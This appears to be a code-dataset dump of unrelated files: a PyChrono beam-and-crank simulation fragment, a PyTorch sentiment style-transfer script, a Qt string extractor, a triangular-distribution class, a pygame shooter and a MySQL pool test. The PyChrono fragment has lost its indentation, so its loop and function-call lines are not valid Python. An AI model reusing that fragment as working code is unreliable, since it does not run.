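# Clamp the first IGA node (at vA) and keep handles to the free-end node (at vC) and a
# node roughly at mid-span of the 32-span beam for later use.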
builder_iga.GetLastBeamNodes().front().SetFixed(True)
node_tip = builder_iga.GetLastBeamNodes()[-1]
node_mid = builder_iga.GetLastBeamNodes()[17]
# Create the vertical beam (Here use Euler beams, for example).
msection2 = fea.ChBeamSectionEulerAdvanced()
hbeam_d = 0.024
msection2.SetDensity(2700)
msection2.SetYoungModulus(73.0e9)
msection2.SetGwithPoissonRatio(0.3)
msection2.SetBeamRaleyghDamping(0.000)
msection2.SetAsCircularSection(hbeam_d)
builderA = fea.ChBuilderBeamEuler()
builderA.BuildBeam(my_mesh, # the mesh where to put the created nodes and elements
msection2, # the ChBeamSectionEulerAdvanced to use for the ChElementBeamEuler elements
3, # the number of ChElementBeamEuler to create
                   vC + vd, # the 'A' point in space (beginning of beam)
                   vB + vd, # the 'B' point in space (end of beam)
chrono.ChVectorD(1, 0, 0)) # the 'Y' up direction of the section for the beam
node_top = builderA.GetLastBeamNodes()[0]
node_down = builderA.GetLastBeamNodes()[-1]
# Create a constraint between the vertical and horizontal beams:
constr_bb = chrono.ChLinkMateGeneric()
constr_bb.Initialize(node_top, node_tip, False, node_top.Frame(), node_top.Frame())
my_system.Add(constr_bb)
constr_bb.SetConstrainedCoords(True, True, True, # x, y, z
False, False, False) # Rx, Ry, Rz
# For example, attach small shape to show the constraint
msphereconstr2 = chrono.ChSphereShape()
msphereconstr2.GetSphereGeometry().rad = 0.01
constr_bb.AddAsset(msphereconstr2)
# Create a beam as a crank
msection3 = fea.ChBeamSectionEulerAdvanced()
crankbeam_d = 0.048
msection3.SetDensity(2700)
msection3.SetYoungModulus(73.0e9)
msection3.SetGwithPoissonRatio(0.3)
msection3.SetBeamRaleyghDamping(0.000)
msection3.SetAsCircularSection(crankbeam_d)
builderB = fea.ChBuilderBeamEuler()
builderB.BuildBeam(my_mesh, # the mesh where to put the created nodes and elements
msection3, # the ChBeamSectionEulerAdvanced to use for the ChElementBeamEuler elements
3, # the number of ChElementBeamEuler to create
                   vG + vd, # the 'A' point in space (beginning of beam)
                   vB + vd, # the 'B' point in space (end of beam)
chrono.ChVectorD(0, 1, 0)) # the 'Y' up direction of the section for the beam
node_crankG = builderB.GetLastBeamNodes()[0]
node_crankB = builderB.GetLastBeamNodes()[-1]
# Create a constraint between the crank beam and body crank:
constr_cbd = chrono.ChLinkMateGeneric()
constr_cbd.Initialize(node_crankG, body_crank, False, node_crankG.Frame(), node_crankG.Frame())
my_system.Add(constr_cbd)
constr_cbd.SetConstrainedCoords(True, True, True, # x, y, z
True, True, True) # Rx, Ry, Rz
# Create a constraint between the vertical beam and the crank beam:
constr_bc = chrono.ChLinkMateGeneric()
constr_bc.Initialize(node_down, node_crankB, False, node_crankB.Frame(), node_crankB.Frame())
my_system.Add(constr_bc)
constr_bc.SetConstrainedCoords(True, True, True, # x, y, z
True, True, False) # Rx, Ry, Rz
# For example, attach small shape to show the constraint
msphereconstr3 = chrono.ChSphereShape()
msphereconstr3.GetSphereGeometry().rad = 0.01
constr_bc.AddAsset(msphereconstr3)
#
# Final touches..
#
# We do not want gravity effect on FEA elements in this demo
my_mesh.SetAutomaticGravity(False)
# Remember to add the mesh to the system!
my_system.Add(my_mesh)
# ==Asset== attach a visualization of the FEM mesh.
# This will automatically update a triangle mesh (a ChTriangleMeshShape
# asset that is internally managed) by setting proper
# coordinates and vertex colors as in the FEM elements.
# Such triangle mesh can be rendered by Irrlicht or POVray or whatever
# postprocessor that can handle a colored ChTriangleMeshShape).
# Do not forget AddAsset() at the end!
mvisualizebeamA = fea.ChVisualizationFEAmesh(my_mesh)
mvisualizebeamA.SetFEMdataType(fea.ChVisualizationFEAmesh.E_PLOT_ELEM_BEAM_MX)
mvisualizebeamA.SetColorscaleMinMax(-500, 500)
mvisualizebeamA.SetSmoothFaces(True)
mvisualizebeamA.SetWireframe(False)
my_mesh.AddAsset(mvisualizebeamA)
mvisualizebeamC = fea.ChVisualizationFEAmesh(my_mesh)
mvisualizebeamC.SetFEMglyphType(fea.ChVisualizationFEAmesh.E_GLYPH_NODE_CSYS)
mvisualizebeamC.SetFEMdataType(fea.ChVisualizationFEAmesh.E_PLOT_NONE)
mvisualizebeamC.SetSymbolsThickness(0.006)
mvisualizebeamC.SetSymbolsScale(0.01)
mvisualizebeamC.SetZbufferHide(False)
my_mesh.AddAsset(mvisualizebeamC)
# ==IMPORTANT!== Use this function for adding a ChIrrNodeAsset to all items
# in the system. These ChIrrNodeAsset assets are 'proxies' to the Irrlicht meshes.
# If you need a finer control on which item really needs a visualization proxy in
# Irrlicht, just use application.AssetBind(myitem) on a per-item basis.
application.AssetBindAll()
# ==IMPORTANT!== Use this function for 'converting' into Irrlicht meshes the assets
# that you added to the bodies into 3D shapes, they can be visualized by Irrlicht!
application.AssetUpdateAll()
# SIMULATION LOOP
# Use a solver that can handle stiffness matrices:
pardiso_solver = pardiso.ChSolverPardisoMKL()
my_system.SetSolver(pardiso_solver)
application.SetTimestep(0.001)
application.SetVideoframeSaveInterval(10)
# Use the following for less numerical damping, 2nd order accuracy (but slower)
ts = chrono.ChTimestepperHHT(my_system)
ts.SetStepControl(False)
my_system.SetTimestepper(ts)
# Output data
if not os.path.isdir(out_dir):
    try:
        os.makedirs(out_dir)
    except OSError:
        print("Error creating output directory " + out_dir)
filename = out_dir + "/buckling_mid.dat"
#file_out1 = chrono.ChStreamOutAsciiFile(filename)
while (application.GetDevice().run()):
application.BeginScene()
application.DrawAll()
chronoirr.drawGrid(application.GetVideoDriver(), 0.05, 0.05, 20, 20, chrono.ChCoordsysD(chrono.VNULL, chrono.CH_C_PI_2, chrono.VECT_Z),
chronoirr.SColor(50, 90, 90, 90), True)
application.DoStep()
# Save output for the first 0.4 seconds
#if (application.GetSystem().GetChTime() <= 0.4):
#file_out1(application.GetSystem().GetChTime() + " " + node_mid.GetPos().z() + " " + node_mid.GetWvel_par().x() + "\n")
application.EndScene()
| 38.16726 | 139 | 0.702657 |
87a00e56f2ce796eab88192eea693b22ec87a146 | 10,375 | py | Python | method/mymodel-yelp/main.py | julian-pani/controllable-text-attribute-transfer | f60281702a37b681634b86c8597df542bafa64f5 | [
"Apache-2.0"
] | null | null | null | method/mymodel-yelp/main.py | julian-pani/controllable-text-attribute-transfer | f60281702a37b681634b86c8597df542bafa64f5 | [
"Apache-2.0"
] | null | null | null | method/mymodel-yelp/main.py | julian-pani/controllable-text-attribute-transfer | f60281702a37b681634b86c8597df542bafa64f5 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# requirements: pytorch: 0.4
# Author: Ke Wang
# Contact: wangke17[AT]pku.edu.cn
import time
import argparse
import math
import os
import torch
import torch.nn as nn
from torch import optim
import numpy
import matplotlib
from matplotlib import pyplot as plt
# Import your model files.
from model import make_model, Classifier, NoamOpt, LabelSmoothing, fgim_attack
from data import prepare_data, non_pair_data_loader, get_cuda, pad_batch_seuqences, id2text_sentence,\
to_var, calc_bleu, load_human_answer
os.environ['CUDA_LAUNCH_BLOCKING'] = "1"
# os.environ["CUDA_VISIBLE_DEVICES"] = "0"
######################################################################################
# Environmental parameters
######################################################################################
parser = argparse.ArgumentParser(description="Here is your model description.")
parser.add_argument('--id_pad', type=int, default=0, help='')
parser.add_argument('--id_unk', type=int, default=1, help='')
parser.add_argument('--id_bos', type=int, default=2, help='')
parser.add_argument('--id_eos', type=int, default=3, help='')
######################################################################################
# File parameters
######################################################################################
parser.add_argument('--task', type=str, default='yelp', help='Specify datasets.')
parser.add_argument('--word_to_id_file', type=str, default='', help='')
parser.add_argument('--data_path', type=str, default='', help='')
######################################################################################
# Model parameters
######################################################################################
parser.add_argument('--word_dict_max_num', type=int, default=5, help='')
parser.add_argument('--batch_size', type=int, default=128, help='')
parser.add_argument('--max_sequence_length', type=int, default=60)
parser.add_argument('--num_layers_AE', type=int, default=2)
parser.add_argument('--transformer_model_size', type=int, default=256)
parser.add_argument('--transformer_ff_size', type=int, default=1024)
parser.add_argument('--latent_size', type=int, default=256)
parser.add_argument('--word_dropout', type=float, default=1.0)
parser.add_argument('--embedding_dropout', type=float, default=0.5)
parser.add_argument('--learning_rate', type=float, default=0.001)
parser.add_argument('--label_size', type=int, default=1)
parser.add_argument('--load_from_checkpoint', type=int, default=False)
parser.add_argument('--checkpoint_name', type=str, default="")
args = parser.parse_args()
# args.if_load_from_checkpoint = False
# args.if_load_from_checkpoint = True
# args.checkpoint_name = "1569079093"
######################################################################################
# End of hyper parameters
######################################################################################
def add_log(ss):
now_time = time.strftime("[%Y-%m-%d %H:%M:%S]: ", time.localtime())
print(now_time + ss)
with open(args.log_file, 'a') as f:
f.write(now_time + str(ss) + '\n')
return
def add_output(ss):
with open(args.output_file, 'a') as f:
f.write(str(ss) + '\n')
return
def preparation():
# set model save path
if args.load_from_checkpoint:
timestamp = args.checkpoint_name
else:
timestamp = str(int(time.time()))
print("create new model save path: %s" % timestamp)
args.current_save_path = 'save/%s/' % timestamp
args.log_file = args.current_save_path + time.strftime("log_%Y_%m_%d_%H_%M_%S.txt", time.localtime())
args.output_file = args.current_save_path + time.strftime("output_%Y_%m_%d_%H_%M_%S.txt", time.localtime())
print("create log file at path: %s" % args.log_file)
if os.path.exists(args.current_save_path):
add_log("Load checkpoint model from Path: %s" % args.current_save_path)
else:
os.makedirs(args.current_save_path)
add_log("Path: %s is created" % args.current_save_path)
# set task type
if args.task == 'yelp':
args.data_path = '../../data/yelp/processed_files/'
elif args.task == 'amazon':
args.data_path = '../../data/amazon/processed_files/'
elif args.task == 'imagecaption':
pass
else:
raise TypeError('Wrong task type!')
# prepare data
args.id_to_word, args.vocab_size, \
args.train_file_list, args.train_label_list = prepare_data(
data_path=args.data_path, max_num=args.word_dict_max_num, task_type=args.task
)
return
def train_iters(ae_model, dis_model):
train_data_loader = non_pair_data_loader(
batch_size=args.batch_size, id_bos=args.id_bos,
id_eos=args.id_eos, id_unk=args.id_unk,
max_sequence_length=args.max_sequence_length, vocab_size=args.vocab_size
)
train_data_loader.create_batches(args.train_file_list, args.train_label_list, if_shuffle=True)
add_log("Start train process.")
ae_model.train()
dis_model.train()
ae_optimizer = NoamOpt(ae_model.src_embed[0].d_model, 1, 2000,
torch.optim.Adam(ae_model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9))
dis_optimizer = torch.optim.Adam(dis_model.parameters(), lr=0.0001)
ae_criterion = get_cuda(LabelSmoothing(size=args.vocab_size, padding_idx=args.id_pad, smoothing=0.1))
dis_criterion = nn.BCELoss(size_average=True)
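    # The autoencoder uses the Noam warmup-then-decay schedule (factor 1, 2000 warmup
    # steps) with a label-smoothed (0.1) reconstruction criterion; the classifier uses
    # plain Adam at lr 1e-4 with binary cross entropy.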
for epoch in range(200):
print('-' * 94)
epoch_start_time = time.time()
for it in range(train_data_loader.num_batch):
batch_sentences, tensor_labels, \
tensor_src, tensor_src_mask, tensor_tgt, tensor_tgt_y, \
tensor_tgt_mask, tensor_ntokens = train_data_loader.next_batch()
# Forward pass
latent, out = ae_model.forward(tensor_src, tensor_tgt, tensor_src_mask, tensor_tgt_mask)
# Loss calculation
loss_rec = ae_criterion(out.contiguous().view(-1, out.size(-1)),
tensor_tgt_y.contiguous().view(-1)) / tensor_ntokens.data
ae_optimizer.optimizer.zero_grad()
loss_rec.backward()
ae_optimizer.step()
# Classifier
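            # The latent code is copied (latent.clone() wrapped by to_var) before the
            # classifier pass, presumably so this discriminator update does not also
            # push gradients back into the autoencoder.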
dis_lop = dis_model.forward(to_var(latent.clone()))
loss_dis = dis_criterion(dis_lop, tensor_labels)
dis_optimizer.zero_grad()
loss_dis.backward()
dis_optimizer.step()
if it % 200 == 0:
add_log(
'| epoch {:3d} | {:5d}/{:5d} batches | rec loss {:5.4f} | dis loss {:5.4f} |'.format(
epoch, it, train_data_loader.num_batch, loss_rec, loss_dis))
print(id2text_sentence(tensor_tgt_y[0], args.id_to_word))
generator_text = ae_model.greedy_decode(latent,
max_len=args.max_sequence_length,
start_id=args.id_bos)
print(id2text_sentence(generator_text[0], args.id_to_word))
add_log(
'| end of epoch {:3d} | time: {:5.2f}s |'.format(
epoch, (time.time() - epoch_start_time)))
# Save model
torch.save(ae_model.state_dict(), args.current_save_path + 'ae_model_params.pkl')
torch.save(dis_model.state_dict(), args.current_save_path + 'dis_model_params.pkl')
return
def eval_iters(ae_model, dis_model):
eval_data_loader = non_pair_data_loader(
batch_size=1, id_bos=args.id_bos,
id_eos=args.id_eos, id_unk=args.id_unk,
max_sequence_length=args.max_sequence_length, vocab_size=args.vocab_size
)
eval_file_list = [
args.data_path + 'sentiment.test.0',
args.data_path + 'sentiment.test.1',
]
eval_label_list = [
[0],
[1],
]
eval_data_loader.create_batches(eval_file_list, eval_label_list, if_shuffle=False)
gold_ans = load_human_answer(args.data_path)
assert len(gold_ans) == eval_data_loader.num_batch
add_log("Start eval process.")
ae_model.eval()
dis_model.eval()
for it in range(eval_data_loader.num_batch):
batch_sentences, tensor_labels, \
tensor_src, tensor_src_mask, tensor_tgt, tensor_tgt_y, \
tensor_tgt_mask, tensor_ntokens = eval_data_loader.next_batch()
print("------------%d------------" % it)
print(id2text_sentence(tensor_tgt_y[0], args.id_to_word))
print("origin_labels", tensor_labels)
latent, out = ae_model.forward(tensor_src, tensor_tgt, tensor_src_mask, tensor_tgt_mask)
generator_text = ae_model.greedy_decode(latent,
max_len=args.max_sequence_length,
start_id=args.id_bos)
print(id2text_sentence(generator_text[0], args.id_to_word))
# Define target label
target = get_cuda(torch.tensor([[1.0]], dtype=torch.float))
if tensor_labels[0].item() > 0.5:
target = get_cuda(torch.tensor([[0.0]], dtype=torch.float))
print("target_labels", target)
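        # Fast-gradient-iterative-modification: nudge the latent code toward the
        # flipped sentiment label using classifier gradients, decoding as it goes.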
modify_text = fgim_attack(dis_model, latent, target, ae_model, args.max_sequence_length, args.id_bos,
id2text_sentence, args.id_to_word, gold_ans[it])
add_output(modify_text)
return
if __name__ == '__main__':
print(args.load_from_checkpoint)
print(args.checkpoint_name)
preparation()
ae_model = get_cuda(make_model(d_vocab=args.vocab_size,
N=args.num_layers_AE,
d_model=args.transformer_model_size,
latent_size=args.latent_size,
d_ff=args.transformer_ff_size,
))
dis_model = get_cuda(Classifier(latent_size=args.latent_size, output_size=args.label_size))
if args.load_from_checkpoint:
# Load models' params from checkpoint
ae_model.load_state_dict(torch.load(args.current_save_path + 'ae_model_params.pkl'))
dis_model.load_state_dict(torch.load(args.current_save_path + 'dis_model_params.pkl'))
else:
train_iters(ae_model, dis_model)
eval_iters(ae_model, dis_model)
print("Done!")
| 39.599237 | 111 | 0.611181 |
d95b8a27ac2ebdd5e4b8ab34161bb2137f577510 | 1,805 | py | Python | share/qt/extract_strings_qt.py | wizadr/DiminutiveCoin | 678ac688217b4578308c3a9cd6ccd1e7a08ecaf4 | [
"MIT"
] | 1 | 2022-03-27T20:06:29.000Z | 2022-03-27T20:06:29.000Z | share/qt/extract_strings_qt.py | MadCatMining/DiminutiveCoin | 678ac688217b4578308c3a9cd6ccd1e7a08ecaf4 | [
"MIT"
] | null | null | null | share/qt/extract_strings_qt.py | MadCatMining/DiminutiveCoin | 678ac688217b4578308c3a9cd6ccd1e7a08ecaf4 | [
"MIT"
] | 2 | 2022-01-10T00:41:44.000Z | 2022-02-24T09:11:26.000Z | #!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
OUT_CPP="src/qt/diminutivecoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
files = glob.glob('src/*.cpp') + glob.glob('src/*.h')
# xgettext -n --keyword=_ $FILES
child = Popen(['xgettext','--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
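# Note: this script targets Python 2; under Python 3 `out` would be bytes and would
# need out.decode('utf-8') before being handed to parse_po() below.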
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *diminutivecoin_strings[] = {')
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("diminutivecoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};')
f.close()
| 25.422535 | 87 | 0.584488 |
f7a7a62d7f576e49e998225fc0a68717990c829d | 7,044 | py | Python | probdists/Triangulardistribution.py | m0hit-kumar/probdists | 786d4f6c53534c318499d97200355f94c8c48919 | [
"MIT"
] | null | null | null | probdists/Triangulardistribution.py | m0hit-kumar/probdists | 786d4f6c53534c318499d97200355f94c8c48919 | [
"MIT"
] | null | null | null | probdists/Triangulardistribution.py | m0hit-kumar/probdists | 786d4f6c53534c318499d97200355f94c8c48919 | [
"MIT"
] | null | null | null | import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
from collections import Counter
import seaborn as sns
class Triangular(Distribution):
"""
Triangular distribution class for calculating and visualizing the
triangular distribution: a continuous probability distribution shaped
like a triangle
Note: a <= mode <= b
Attributes:
a (float): the minimum lower limit value
b (float): the maximum upper limit value
mode (float): the mode, where min <= mode <= max
mean (float): the mean value of the distribution
stdev (float): the standard deviation of the distribution
"""
def __init__(self, a=0, b=1, mode=0.5):
        if mode < a or mode > b or a == b:
            raise ValueError
if a == b or a == mode or b == mode:
raise TriangularValueException()
self.a = a
self.b = b
self.mode = mode
Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev())
def calculate_mean(self, round_to=2):
"""
Method to calculate the mean from the min, max and mode
Args:
round_to (int): Round the mean value. Defaults to 2.
Returns:
float: mean of the data set
"""
self.mean = 1 / 3 * (self.a + self.b + self.mode)
return round(self.mean, round_to)
def calculate_stdev(self, round_to=2):
"""
Method to calculate the standard deviation from the min, max and mode
Args:
round_to (int): Round the mean value. Defaults to 2.
Returns:
float: standard deviation of the data set
"""
summation = (
(self.a ** 2)
+ (self.b ** 2)
+ (self.mode ** 2)
- (self.a * self.b)
- (self.a * self.mode)
- (self.b * self.mode)
)
variance = summation / 18
self.stdev = math.sqrt(variance)
return round(self.stdev, round_to)
def replace_stats_with_data(self):
"""Method to calculate a, b, mode from the data set
Args:
None
Returns:
float: a, the minimum value
float: b, the maximum value
float: mode, the mode of the dataset
"""
if not self.data:
# Use default values
min_a, max_b, mode = 0, 1, 0.5
else:
min_a = min(self.data)
max_b = max(self.data)
mode = self.calculate_mode()
        if min_a == max_b or min_a == mode or max_b == mode:
raise TriangularValueException()
self.a = min_a
self.b = max_b
self.mode = mode
return self.a, self.b, self.mode
def calculate_mode(self, round_to=2):
"""
Calculates the mode of a dataset
        If the data set has more than one mode, a TriangularValueException is raised
Args:
round_to (int): Round the mode value. [Default value: 2]
Returns:
float: mode of data
"""
frequency_dict = dict(Counter(self.data))
max_frequency = max(list(frequency_dict.values()))
# Create list of modes from data
mode = [k for k, v in frequency_dict.items() if v == max_frequency]
if len(mode) == 1:
return mode[0]
else:
# Multiple modes
msg = f"""Multiple modes found: {str(mode)}, Triangular Distribution requires single mode"""
raise TriangularValueException(msg)
def calculate_pdf(self, x, round_to=2):
"""
Probability density function calculator for the Triangular distribution.
Args:
x (float): point for calculating the probability density function
round_to (int): Round the pdf value. [Default value: 2]
Returns:
float: probability density function
"""
# Check equivalence
if self.a == self.b or self.a == self.mode or self.b == self.mode:
raise TriangularValueException()
value = 0 # default value for when x < min or x > max
if self.a <= x < self.mode:
value = (2 * (x - self.a)) / ((self.b - self.a) * (self.mode - self.a))
elif self.mode == x:
value = 2 / (self.b - self.a)
elif self.mode < x <= self.b:
value = (2 * (self.b - x)) / ((self.b - self.a) * (self.b - self.mode))
self.pdf = value
return round(self.pdf, round_to)
def calculate_cdf(self, x, round_to=2):
"""
Cumulative density function calculator for the Triangular distribution.
Args:
x (float): point for calculating the cumulative density function
round_to (int): Round the value. [Default value: 2]
Returns:
float: cumulative density function output
"""
# Check equivalence
if self.a == self.b or self.a == self.mode or self.b == self.mode:
raise TriangularValueException()
if x < self.a:
value = 0
elif self.a <= x <= self.mode:
num = (x - self.a) ** 2
den = (self.b - self.a) * (self.mode - self.a)
value = num / den
elif self.mode < x <= self.b:
num = (self.b - x) ** 2
den = (self.b - self.a) * (self.b - self.mode)
value = 1 - (num / den)
else:
value = 1
self.cdf = value
return round(self.cdf, round_to)
def plot_bar_pdf(self):
"""
Method to plot the pdf of the triangular distribution.
Args:
self
Returns:
None
"""
x = [self.a, self.mode, self.b]
peak = 2 / (self.b - self.a)
y = [0, peak, 0]
        sns.lineplot(x=x, y=y).set(
            title="Probability Density Plot for Triangular Distribution",
            xlabel="x",
            ylabel="Probability density",
        )
plt.show()
return x, y
def __repr__(self):
"""
Outputs the characteristics of the Triangular Distribution instance.
Args:
self
Returns:
string: characteristics of the Triangle
"""
return (
f"minimum: {self.a}, maximum: {self.b}, mode: {self.mode}, "
f"mean: {self.mean}, standard deviation: {self.stdev}"
)
class TriangularValueException(Exception):
"""
Defines Exception raised when minimum, maximum or mode values are equal
and TriangularDistribution instance cannot be created
Attributes:
message (str): Error message to return
"""
def __init__(self, msg=None):
if msg is not None:
self.message = msg
else:
self.message = "Minimum, Maximum, or Mode cannot be equivalent"
def __str__(self):
if self.message:
return f"""TriangularValueException: {self.message}"""
return f"""TriangularValueException Raised"""
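# --- Minimal usage sketch (illustrative only, not part of the library API) ---
# Builds a hypothetical Triangular(0, 10, 5) distribution and prints a few values;
# the numbers noted in the comments follow from the formulas implemented above.
if __name__ == "__main__":
    tri = Triangular(a=0, b=10, mode=5)
    print(tri)                    # minimum, maximum, mode, mean (5.0), stdev (~2.04)
    print(tri.calculate_pdf(5))   # peak density 2 / (b - a) = 0.2
    print(tri.calculate_cdf(5))   # 0.5 by symmetry of this example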
| 28.634146 | 104 | 0.548978 |
d94e48635e9d2ef72aafeb89e0cd91465420f984 | 1,167 | py | Python | shuter/shooter_game.py | vlax679/shuter | 8df27dfc9f6686df4f7b97ac831fb9518ea7da95 | [
"CC0-1.0"
] | null | null | null | shuter/shooter_game.py | vlax679/shuter | 8df27dfc9f6686df4f7b97ac831fb9518ea7da95 | [
"CC0-1.0"
] | null | null | null | shuter/shooter_game.py | vlax679/shuter | 8df27dfc9f6686df4f7b97ac831fb9518ea7da95 | [
"CC0-1.0"
] | null | null | null | from pygame import *
# create the game window
window = display.set_mode((800,600))
display.set_caption("Шутер")
background = transform.scale(image.load("galaxy.jpg"),(800,600))
# set the scene background
clock = time.Clock()
FPS = 100
# create 2 sprites and place them on the scene
mixer.init()
mixer.music.load("space.ogg")
mixer.music.play()
# handle the 'Close window' button click event
class Player(sprite.Sprite):
def __init__(self,picture,speed,sx,sy,window):
self.picture = picture
self.speed = speed
self.sx = sx
self.sy = sy
self.sub = transform.scale(image.load(self.picture),(100,100))
self.window = window
def update(self):
self.window.blit(self.sub,(self.sx,self.sy))
keys_pressed = key.get_pressed()
if keys_pressed[K_d] and self.sx < 800:
self.sx += self.speed
if keys_pressed[K_a] and self.sx >0:
self.sx -= self.speed
x = 3
y = 500
game = True
player = Player("rocket.png",10,x,y,window)
while game:
window.blit(background,(0,0))
player.update()
for e in event.get():
if e.type == QUIT:
game=False
    display.update()
    clock.tick(FPS)
| 25.369565 | 70 | 0.634105 |
2ba6252815a9e7af063eb544b38007c502f9003b | 847 | py | Python | tests/test_mysql_connection_pool.py | maypimentel/mysql_connection_pool | a6d193ee62d24fbc9aec449dd3bc9bf00375927d | [
"MIT"
] | null | null | null | tests/test_mysql_connection_pool.py | maypimentel/mysql_connection_pool | a6d193ee62d24fbc9aec449dd3bc9bf00375927d | [
"MIT"
] | null | null | null | tests/test_mysql_connection_pool.py | maypimentel/mysql_connection_pool | a6d193ee62d24fbc9aec449dd3bc9bf00375927d | [
"MIT"
] | null | null | null | import pytest
from mysql_connection_pool import MysqlPool
from mysql.connector import MySQLConnection
from mysql.connector.errors import PoolError
class TestMysqlConnectionPool:
def setup_method(self, method):
self.pool = MysqlPool(pool_size=2, pool_max_size=2)
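        # These tests assume a reachable MySQL server (using MysqlPool's default
        # connection settings) with a `book` table containing at least one row.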
def test_cnx_type(self):
cnx = self.pool.get_connection()
assert isinstance(cnx, MySQLConnection)
def test_cnx_and_cursor(self):
cnx = self.pool.get_connection()
cursor = cnx.cursor()
cursor.execute('SELECT * FROM book LIMIT 1;')
cursor.fetchall()
assert cursor.rowcount == 1
def test_pool_empty(self):
cnx1 = self.pool.get_connection()
cnx2 = self.pool.get_connection()
with pytest.raises(PoolError, match='Pool exhausted'):
cnx3 = self.pool.get_connection()
| 31.37037 | 62 | 0.68477 |
335ebe7bff7191a76f4fdddea8e48d3a68f98df0 | 747 | py | Python | vispy/util/fonts/_vispy_fonts.py | shjoshi/vispy | 2f3d169aa60c738467e766c59096f51570483d6f | [
"BSD-3-Clause"
] | null | null | null | vispy/util/fonts/_vispy_fonts.py | shjoshi/vispy | 2f3d169aa60c738467e766c59096f51570483d6f | [
"BSD-3-Clause"
] | null | null | null | vispy/util/fonts/_vispy_fonts.py | shjoshi/vispy | 2f3d169aa60c738467e766c59096f51570483d6f | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2014, Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
from .._data import get_data_file
# List the vispy fonts made available online
_vispy_fonts = ('OpenSans', 'Cabin')
def _get_vispy_font_filename(face, bold, italic):
"""Fetch a remote vispy font"""
name = face + '-'
name += 'Regular' if not bold and not italic else ''
name += 'Bold' if bold else ''
name += 'Italic' if italic else ''
name += '.ttf'
return get_data_file('fonts/%s' % name)
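# For example, _get_vispy_font_filename('OpenSans', bold=True, italic=False) resolves
# to the packaged 'fonts/OpenSans-Bold.ttf' data file.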
| 35.571429 | 79 | 0.519411 |